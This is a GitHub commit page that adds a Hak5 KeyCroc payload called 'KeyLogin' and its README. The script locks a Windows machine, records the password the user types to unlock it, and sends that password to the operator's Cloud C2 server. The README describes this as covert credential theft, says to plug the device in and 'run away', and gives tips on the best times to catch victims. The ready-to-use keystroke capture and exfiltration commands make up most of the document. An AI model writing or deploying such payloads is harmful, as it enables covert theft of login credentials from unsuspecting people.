Merge pull request #46 from 0iphor13/master

Uploaded KeyLogin
pull/47/merge
hak5glytch 2022-11-07 09:31:42 -08:00 committed by GitHub
commit 2da4c3f537
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
4 changed files with 74 additions and 0 deletions

Binary file not shown.

After

Width:  |  Height:  |  Size: 14 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 24 KiB

View File

@ -0,0 +1,39 @@
###############################KeyLogin#####################################
# Version 1.1
# OS: Windows
# Author: 0iphor13
# Discription: This extremely simple payload will lock the targets machine and will wait for it to insert the password.
# Afterwards these will be exfiltrated to your CloudC2 instance. The most covert technique to get clear text credentials!
#
####################Defining Language,Trigger & Clean Up#####################
MATCH \[ENTER\]
Q DELAY 2000
export DUCKY_LANG=de
Q DELAY 2000
rm /root/loot/win-pass*
########################Locking User Machine################################
Q LOCK
Q DELAY 500
Q GUI l
C2NOTIFY INFO 'Locked Users Machine!'
Q DELAY 250
Q DELETE
Q DELAY 250
Q UNLOCK
WAIT_FOR_KEYBOARD_ACTIVITY 1
#######Define until which point you want to intercept the keystrokes########
SAVEKEYS /root/loot/win-pass.txt NEXT 4
Q DELAY 2000
while [ ! -f /root/loot/win-pass.txt ]; do sleep 2; done
#####################Exfiltrating Credentials###############################
C2EXFIL /root/loot/win-pass.txt
Q DELAY 1000
C2NOTIFY INFO 'User Credentials Received!'
#You may want to delete or disable to payload after execution to avoid endless logout processes
#rm /root/udisk/payloads/KeyLogin.txt

View File

@ -0,0 +1,35 @@
**Title: KeyLogin**
<p>Author: 0iphor13<br>
OS: Windows<br>
Version: 1.1<br>
Requirements: CloudC2 Instance</p>
**What is KeyLogin?**
#
*When using a KeyCroc, what is your goal? Likely credentials or remote access.*
*But many environments, especially within the banking sector are locked down.*
*Taking advantage of available resources not only facilitates the use of payloads, it also enables long, undetected actions during an engagement.*
*KeyLogin makes use of the Windows shortcut [Windows]+L to lock the system. Thanks to the KeyCrocs ability to sniff keystrokes, the password or pin can then be exfiltrated.*
*This payload automates login stealing. It waites for the victim to press enter (to avoid logging wrong credentials), then locks the targets screen and sends the received credentials to your C2 instance.*
*As there are different sorts of authentication types for windows systems, you can/need to configure until which point you want to intercept theses keystrokes. Until ENTER is pressed? Until a certain lenght was typed? It's up to you!*
#
There you go, login credentials, exfiltrated in an automated manner, without the risk of getting caught.
**Instruction:**
- Connect KeyCroc to C2
- Configure payload language and DELAYs
- Plugin KeyCroc & run away (pro tip: In the morning or after lunch your chances to get a good result are much higher)
- You might want to disable to payload after the first success to avoid locking out the user!
KeyCroc will Notify you of the current attack state
![alt text](https://github.com/0iphor13/keycroc-payloads/blob/master/payloads/library/credentials/KeyLogin/notifications.png)
KeyCroc will save the inserted credentials into a seperate file for you
![alt text](https://github.com/0iphor13/keycroc-payloads/blob/master/payloads/library/credentials/KeyLogin/loot.png)
Credit for support:
- Korben